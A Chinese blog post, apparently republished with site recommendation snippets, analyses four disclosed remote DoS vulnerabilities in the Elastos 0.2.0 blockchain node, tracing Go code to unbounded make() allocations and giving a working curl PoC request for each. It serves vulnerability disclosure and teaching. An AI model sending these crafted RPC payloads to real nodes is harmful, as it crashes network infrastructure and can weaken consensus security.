【公链安全】亦来云多个远程DoS漏洞详解

最新推荐文章于 2023-03-22 09:54:19 发布
最新推荐文章于 2023-03-22 09:54:19 发布
阅读量469 收藏 1
点赞数

关于区块链安全的资料,目前互联网上主要侧重于钱包安全、智能合约安全、交易所安全等,而很少有关于公链安全的资料,公链是以上一切业务应用的基础,本文将介绍公链中比较常见的一种的DoS漏洞。

0x1 知识储备

公链客户端与其他传统软件的客户端没有太大区别,在传统软件上会遇到的问题在公链客户端中都有可能遇到。

所以要让一个客户端发生Crash的常见方法有:

  1. 使程序发生运行时异常,且这个异常没有被容错,例如数组越界除以0内存溢出等。
  2. 使系统环境不满足程序运行的要求,例如创建大数组造成的OOM限递归造成的OOM
  3. 多线程死锁
  4. 其他

公链节点可被轻易攻击下线的危害是巨大的,比如会使网络算力骤减,从而导致51%攻击等。

本文根据亦来云的这几个漏洞主要介绍的是由OOM所引起的Crash漏洞。

0x2 漏洞分析

本文主要对亦来云公链0.2.0的以下价值20ETH的4个漏洞进行分析:

DVP-2018-08809(Reward:5ETH)

DVP-2018-08813(Reward:5ETH)

DVP-2018-08817(Reward:5ETH)

DVP-2018-10793(Reward:5ETH)

DVP-2018-08809

servers/interfaces.go漏洞代码片段:

func DiscreteMining(param Params) map[string]interface{} {        
    if LocalPow == nil {                
        return ResponsePack(PowServiceNotStarted, "")    }    count, ok := param.Uint("count")    
    if !ok {    
        return ResponsePack(InvalidParams, "")    }
    ret := make([]string, count)   
    blockHashes, err := LocalPow.DiscreteMining(uint32(count))        
    if err != nil {            
        return ResponsePack(Error, err)    }        
    for i, hash := range blockHashes {        ret[i] = ToReversedString(*hash)    }        
    return ResponsePack(Success, ret)}

根据以上代码可以发现DiscreteMining函数会接收一个param参数,并从param中取出一个值赋值给count变量。

然后count变量会被待会make函数中

通过官方文档了解到make函数是用于创建数组的,而数组的长度由第二个参数控制,理论上只要第二个参数很大,就会产生一个占有大量内存的数组,从而导致OOM。

而make函数的第二个参数可以通过param参数来控制,所以只要param参数是远程可控的,就可以远程使节点Crash了。

最终在httpjsonrpc/server.go中发DiscreteMining能通过rpc接口远程调用,而目前的客户端是默认开启rpc并绑定公网地址的,所以可以对公网上任意节点发送恶意包使其Crash。

StartRPCServer函数代码片段:

func StartRPCServer() {    mainMux = make(map[string]func(Params)     
    map[string]interface{})    http.HandleFunc("/", Handle)    //省略一段    // mining interfaces    mainMux["togglemining"] = ToggleMining   
    mainMux["discretemining"] = DiscreteMining    err :=http.ListenAndServe(":"+strconv.Itoa(Parameters.HttpJsonPort), nil)
    if err != nil {        log.Fatal("ListenAndServe: ", err.Error())    }}

PoC:

curl --data-binary '{"method":"discretemining","params":{"count":"99999999999999"}}' -H 'Content-Type:application/json' http://*.*.*.*:20333

漏洞复现:

DVP-2018-08813

core/payloadwithdrawfromsidechain.go漏洞代码片段:

func (t *PayloadWithdrawFromSideChain) Deserialize(r io.Reader, version byte) error {    height, err := common.ReadUint32(r)
    if err != nil {
        return errors.New("[PayloadWithdrawFromSideChain], BlockHeight deserialize failed.")    }    address, err := common.ReadVarString(r)
    if err != nil {
        return errors.New("[PayloadWithdrawFromSideChain], GenesisBlockAddress deserialize failed.")    }
    length, err := common.ReadVarUint(r, 0)

    if err != nil {
        return errors.New("[PayloadWithdrawFromSideChain], SideChainTransactionHashes length deserialize failed")    }    t.SideChainTransactionHashes = nil    t.SideChainTransactionHashes = make([]common.Uint256, length)    
    for i := uint64(0); i < length; i++ {   
        var hash common.Uint256        err := hash.Deserialize(r)
        if err != nil {
            return errors.New("[WithdrawFromSideChain], SideChainTransactionHashes deserialize failed.")        }        t.SideChainTransactionHashes[i] = hash    }    t.BlockHeight = height    t.GenesisBlockAddress = address    return nil}

这里同样是由于make函数的第二个参数由参数r控制,只要r可控就可以使make函数引发OOM,从而Crash。

在servers/interface.go中的SendRawTransaction函数中发现间接的调用了Transaction的Deserialize函数,具体如下:

func SendRawTransaction(param Params) map[string]interface{} {
    str, ok := param.String("data")
    if !ok {
        return ResponsePack(InvalidParams, "need a string parameter named data")    }
    bys, err := HexStringToBytes(str)
    if err != nil {
        return ResponsePack(InvalidParams, "hex string to bytes error")    }
    var txn Transaction
    err := txn.Deserialize(bytes.NewReader(bys)); err != nil {        
        return ResponsePack(InvalidTransaction, "transaction deserialize error")    }
    if errCode := VerifyAndSendTx(&txn); errCode != Success {
        return ResponsePack(errCode, errCode.Message())    }
    return ResponsePack(Success, ToReversedString(txn.Hash()))}

根据如上标红代码可以发现SendRawTransaction函数会先取RPC接口传来的data参数复制给变量str,然后变量str会转换为bytes复制给变量bys,最后bys变量会被带入Transaction的Deserialize函数中。

再看看Transaction的Deserialize函数:

func (tx *Transaction) Deserialize(r io.Reader) error {
// tx deserialize
    if err := tx.DeserializeUnsigned(r); err != nil
    {
        //略
        return nil
    }   
//略

参数r被带入了Transaction的DeserializeUnsigned函数中,继续跟踪一下:

func (tx *Transaction) DeserializeUnsigned(r io.Reader) error {
//略
    tx.Payload, err = GetPayload(tx.TxType)
    if err != nil {
        return err    }    err = tx.Payload.Deserialize(r, tx.PayloadVersion)
    //略
    return nil
}
func GetPayload(txType TransactionType) (Payload, error) {
    var p Payload
    switch txType {
        //略
        case WithdrawFromSideChain:
            p = new(PayloadWithdrawFromSideChain)
        case TransferCrossChainAsset:            p = new(PayloadTransferCrossChainAsset)
        default:return nil, errors.New("[Transaction], invalid transaction type.")    }
    return p, nil
}

在该函数中会先通过GetPayload(tx.TxType)来取到tx.Payload,然后会调用tx.Payload的Deserialize函数,只要能控制Payload的类型为PayloadWithdrawFromSideChain,就可以触发PayloadWithdrawFromSideChain的Deserialize函数,而Transaction是通过RPC接口远程传来的,所以tx对象的字段都是可控的。

最终的利用链:RPC的SendRawTransaction接口->Transaction的Deserialize函数->Transaction的DeserializeUnsigned函数->通过GetPayload取到取到PayloadWithdrawFromSideChain对象->调用其的Deserialize函数->触发make->OOM

PoC:

curl --data-binary '{"method":"sendrawtransaction","params":{"data":"0701100000000196ffffffffff"}}' -H 'Content-Type:application/json' http://*.*.*.*:20336

漏洞复现:

DVP-2018-08817

还是上面的Deserialize函数引起的OOM,不过触发点不同。

这次的触发点是在servers/interfaces.go中的SubmitAuxBlock函数中:

func SubmitAuxBlock(param Params) map[string]interface{} {    blockHash, ok := param.String("blockhash")
    if !ok {
        return ResponsePack(InvalidParams, "parameter blockhash not found")    }
    var msgAuxBlock *Block
    if msgAuxBlock, ok = LocalPow.MsgBlock.BlockData[blockHash]; !ok {        log.Trace("[json-rpc:SubmitAuxBlock] block hash unknown", blockHash)
        return ResponsePack(InternalError, "block hash unknown")    }    auxPow, ok := param.String("auxpow")
    if !ok {
        return ResponsePack(InvalidParams, "parameter auxpow not found")    }
    var aux aux.AuxPow    buf, _ := HexStringToBytes(auxPow)
    if err := aux.Deserialize(bytes.NewReader(buf)); err != nil {        log.Trace("[json-rpc:SubmitAuxBlock] auxpow deserialization failed", auxPow)
        return ResponsePack(InternalError, "auxpow deserialization failed")    }
    //略
    return ResponsePack(Success, true)}

根据如上代码可以发现,RPC接口传过来的auxpow参数经过转为bytes后会传入变量buf,最终变量buf会被带入Deserialize函数中,所以整个过程也是可控的,唯一不足的是这个触发点还需要提供另外一个参数blockhash,如果不提供这个参数或者提供有误的话会没法往下执行,不过好在正好还有一个CreateAuxblock函数,利用此函数可以创建一个Auxblock并得到它的blockhash。

PoC:

curl --data-binary '{"method":"createauxblock","params":{"paytoaddress":"0701100000000196ffffffffff"}}' -H 'Content-Type:application/json' http://*.*.*.*:20336 
curl --data-binary '{"method":"submitauxblock","params":{"blockhash":"上个请求返回的blockhash","auxpow":"ffffffffffffffffff"}}' -H 'Content-Type:application/json' http://*.*.*.*:20336

漏洞复现:

DVP-2018-10793

最后这一个漏洞问题不是出在亦来云公链源码中,而是出在亦来云公链的官方依赖包(Elastos.ELA.Utility)中

common/serialize.go漏洞代码片段:

func ReadVarBytes(reader io.Reader) ([]byte, error) {        val, err := ReadVarUint(reader, 0)
    if err != nil {
        return nil, err        }        str, err := byteXReader(reader, val)
        if err != nil {
            return nil, err            }    
            return str, nil
    }    
            
func byteXReader(reader io.Reader, x uint64) ([]byte, error) {        p := make([]byte, x)        n, err := reader.Read(p)
    if n > 0 {
        return p[:], nil  
    } 
    return p, err    }

ReadVarBytes函数会从reader参数中取出一个数值给val变量,val变量会被带入byteXReader函数 中,而byteXReader函数会将接收到的第二个参数带入make函数的第二个参数中,所以只要reader可控的话就能构造一段payload最终使make函数引起OOM。

由于这个函数在一个通用工具库中,所以理论上可以从很多地方触发,这个漏洞还是使用的是RPC接口的SendRawTransaction函数的Deserialize函数进行触发。

func (tx *Transaction) Deserialize(r io.Reader) error {
//略
    for i := uint64(0); i < count; i++ {
        var program Program
        if err := program.Deserialize(r); err != nil {
            return errors.New("transaction deserialize program error: " + err.Error())        }        tx.Programs = append(tx.Programs, &program)    }
    return nil
}

然后调用到了Program的Deserialize函数:

func (p *Program) Deserialize(w io.Reader) error {    parameter, err := ReadVarBytes(w)
    if err != nil {
        return errors.New("Execute Program Deserialize Parameter failed.")    }    p.Parameter = parameter
    code, err := ReadVarBytes(w)
    if err != nil {
        return errors.New("Execute Program Deserialize Code failed.")    }    p.Code = code
    return nil
}

然后就调用到了依赖库中的ReadVarBytes函数,该函数会调用触发OOM的byteXReader函数,数据都是一路从RPC接口传过来的,所以是可控的。

那么利用链就很明了了:RPC的SendRawTransaction接口->Transaction的Deserialize函数->Program的Deserialize函数->依赖库中的ReadVarBytes函数->byteXReader函数->触发make->OOM

PoC:

curl --data-binary '{"method":"sendrawtransaction","params":{"data":"0301ffffffffff"}}' -H 'Content-Type:application/json' http://*.*.*.*:20336

漏洞复现:

 

0x3 总结

Crash漏洞其实在传统安全领域已经非常常见了,比如Fuzzing浏览器,在遇到某些特殊输入的时候浏览器就会发生Crash,不过仅仅是Crash的话在传统客户端领域,危害其实并不是很大。

但在区块链中便不同了,任何一个微小的问题都可以被无限放大,例如:整型溢出漏洞导致超额铸币。所以就Crash漏洞来说,在区块链的公链中也是属于高危类型的漏洞,因为公链节点既是客户端 也是服务端,属于整个公链生态的基础设施。

目前公链安全由于其门槛相对较高,所以研究的人也比较少,DVP基金会将秉着负责任的披露原则逐步公开行业内的经典漏洞案例,为区块链安全领域添砖加瓦,同时我们也希望更多的白帽子参与到区块链安全这个还处于蛮荒阶段的领域中来。

FLy_鹏程万里
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP安全问题:远程溢出、DoS、safe_mode绕过漏洞.pdf
11-23
### PHP安全问题详解远程溢出、DoS与safe_mode绕过漏洞 #### Web服务器安全:构建防御的第一道防线 Web服务器作为承载PHP应用程序的基础,其安全性至关重要。确保Web服务器安全,尤其是Apache这类常用服务器,是...
【代码扫描修复】DoS 拒绝服务漏洞
ACGkaka的博客
11-18 1275
如果应用程序存在 Denial Of Service(DoS漏洞,攻击者就能阻止合法用户访问由该应用程序提供的服务。攻击者可能通过对应用程序发送大量请求,而使它拒绝对合法用户的服务,但是这种攻击形式经常会在网络层就被排除掉了。导致出现很多问题的原因之一是资源释放不当的 bug,这种 bug 会导致应用程序在运行时停止。同样的道理,当程序漏洞被利用时,服务可能会停止或者处理它使用的资源的方式。如果一项服务收到了大量的请求,那么它可能会停止向合法用户提供。修复建议:避免因流无限大,导致的死循环或内存溢出。
CTF中文件上传题目整理总结
xiaotaode2012的专栏
08-16 1万+
0X00说在前面的话 CTF中或多或少都有点文件上传的题目,而这个又是最好整理的,变化的方式不是很多(至少到目前为止我没有发现太多的姿势。。。。),随意就先整理这个吧。 0x01文件上传绕过的主要姿势有: A:基于前台JS的验证,这个 不要说就是firebug下修改一下JS文件就绕过了 B:基于文件后缀名的绕过,这里面的主要姿势有:利用后缀名大小写混用绕过、空格或者
安全警报】Spring DoS漏洞曝光!涉及所有版本,建议立即升级!
最新发布
weixin_49044033的博客
03-22 1293
Spring Security 是其中的一项重要功能,提供了模块化的认证和授权方式,可以轻松集成到 Web 应用中,并支持多种身份验证方式,包括基于表单、指令、口令和 OpenID 等方式。CVE-2023-20861:在 Spring Framework 6.0.0-6.0.6、5.3.0-5.3.25、5.2.0.RELEASE-5.2.22.RELEASE 和更早已经不被支持的版本中,用户可以提供一个特殊设计的 SpEL 表达式,它能导致拒绝服务(DoS)攻击。六、Spring Boot。
dos攻击
M醉清风Y的博客
03-05 5479
DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。 DoS攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃,而在此攻击中并不包括侵入
网络攻防:telnet远程登录和拒绝服务攻击的实现(dos攻击)
热门推荐
薯片薯条的博客
10-07 9万+
首先先说下我写这些文章的目的.我的专业就是网络安全,因此,也愿意把自己所学的一些东西都分享出来.不过由于涉及到很多黑客的东西,一些软件我就不发了,脚本什么的你们可以拿去用. 更多的是为了给大家普及一下管于黑客的知识,以及如何防范黑客.这是我写的第一篇文章,希望能给你们带来一些启发. 实验环境:三台虚拟机,win7,win7,win2003,并且要关掉所有的防火墙 一.telnet远程登录 1.实验环境搭建 实验环境:攻击机win7,靶机win2003 telnet是windows里面的一个服务.基本w.
2016年iOS公开可利用漏洞总结
08-31
2016年,多个严重漏洞的曝光揭示了iOS的安全脆弱性,这些漏洞可能导致远程代码执行或设备越狱,极大地威胁了用户的数据安全。 首先,我们来看一个名为“mach_portal”的攻击链,它由Google Project Zero的安全研究...
dos入侵命令
11-28
本文列举了多个基于DOS的网络入侵命令及其应用场景。对于从事网络安全行业的专业人士来说,掌握这些命令不仅有助于提高工作效率,还能在实际工作中更好地保护网络系统免受攻击。需要注意的是,在非授权情况下使用...
网站常见漏洞及解决办法
09-29
**问题描述**:Apache的多路复用模式(MPM)中的worker模块可能存在远程拒绝服务(DoS漏洞。攻击者可能利用这一漏洞导致Web服务器崩溃或资源耗尽,从而使正常用户无法访问服务。 **解决方案**: 针对Apache MPM ...
PHP配置安全检查工具 – PCC
09-19
**PHP配置安全检查工具PCC详解** PHP配置安全检查工具(PCC)是为系统管理员设计的一款实用脚本,主要用于确保PHP环境的配置文件`php.ini`的安全性。该工具通过对`php.ini`的各项设置进行分析,帮助用户识别并修复...
DOS sleep命令模拟
06-02
DOS 下没有sleep命令,可以用脚本进行模拟
PHP multipartform-data 远程DOS漏洞
06-25
验证PHP multipartform-data 的远程DOS漏洞,适用于绿盟扫描器直接扫出来的漏洞验证
RK平台5640 camera预览界面帧率过低的分析
小陈的博客
05-10 3090
hal 层 /hardware/rockchip/camera ├── AAL Android Abstraction Layer, 负责与 framework 交互 ├── common 公用文件,如线程,消息处理,Log 打印等实现 ├── etc 配置文件目录 ├── include Control loop 的头文件,buffer_manager 相关头文件 ├── lib 3a engine 相关库 ├── psl Physica
dos攻击原理及攻击实例(带脚本)
zsd747289639的博客
01-03 2万+
首先声明,以下仅作为测试用,请勿作为非法用途。 dos攻击原理:DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。(百度百科说的,大概就是这么个意思)。 dos攻击与ddos攻击的区别就是,它是一对一的攻击,而ddos是分布式的攻击,作为入门,作为菜鸟,我们他妈哪里有那么多肉鸡给你用。。。所以不过对付一些带宽小,内存低,cpu渣的小型web服务器还是ok的
慢速DOS攻击漏洞
JesJiang的博客
09-26 2581
漏洞描述: 利用的HTTP POST:POST的时候,指定一个非常大的content-length,然后以很低的速度发包,比如10-100s发一个字节,hold住这个连接不断开。这样当客户端连接多了后,占用住了webserver的所有可用连接,从而导致DOS。 修复方法: 对web服务器的http头部传输的最大许可时间进行限制,修改成最大许可时间为8秒。 tomcat tomcat配置文件conf...
完美的Dos批处理实现sleep
footpath的专栏
06-13 1万+
转来一片文章,今天用到了才去查,放在这里,以后要时常翻翻看。 完美的批处理Sleep2007-03-23 09:45作者:tombkeeper[Base64Decode("dG9tYmtlZXBlckB4Zm9jdXMub3Jn")]出处:http://hi.baidu.com/tombkeeper时间:2007.03.23 我以前写脚本遇到需要Sl
Dos循环及Sleep实现
weixin_33939843的博客
07-04 684
为什么80%的码农都做不了架构师?>>> ...
【转】cve2014-3153 漏洞之详细分析与利用
weixin_30790841的博客
04-20 279
背景学习: Linux Futex的设计与实现 使用者角度看bionic pthread_mutex和linux futex实现 By kernux TopSec α-lab 一 漏洞概述 这个漏洞是今年5月份爆出来的,漏洞影响范围非常广。受影响的Linux系统可能被直接DOS,精心设计可以获取根权限。该漏洞主要产生于内核的 Futex系统调用。Futex是快速用户空间mutex...
漏洞总结及修复
0xdawn的博客
02-05 3116
0x00 暴力破解 暴力破解,是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。如2014年轰动全国的12306撞库事件,实质就是暴力破解攻击。 C/S架构 Hydra 破解MySQL hydra -L user.txt -P pass.txt 192.168.0.1 mysql 破解FTP hydra -l admin -P pass.txt -t 5 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值